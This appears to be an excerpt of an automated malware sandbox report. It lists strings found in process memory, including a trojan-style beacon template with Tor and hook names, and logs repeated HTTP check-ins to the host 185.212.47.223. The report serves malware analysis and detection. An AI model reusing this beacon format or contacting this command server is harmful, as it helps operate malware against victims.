Source: explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.212.47.223

Source: global traffic	HTTP traffic detected: GET /images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive

Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: resolver1.opendns.com

Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp	String found in binary or memory: http://185.212.47.223/favicon.ico
Source: explorer.exe, 0000001E.00000003.872503018.000000000DC64000.00000004.00000040.sdmp	String found in binary or memory: http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F
Source: explorer.exe, 0000001E.00000003.873444020.000000000DC9A000.00000004.00000040.sdmp, explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/IT
Source: RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/
Source: explorer.exe, 0000001E.00000000.846213783.000000000A863000.00000004.00000001.sdmp	String found in binary or memory: http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000002.858092350.000001D7ABCB7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoftjX
Source: WerFault.exe, 00000025.00000003.881569101.0000000004A79000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoftjX2E
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000018.00000002.858800178.000001D7ABEC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
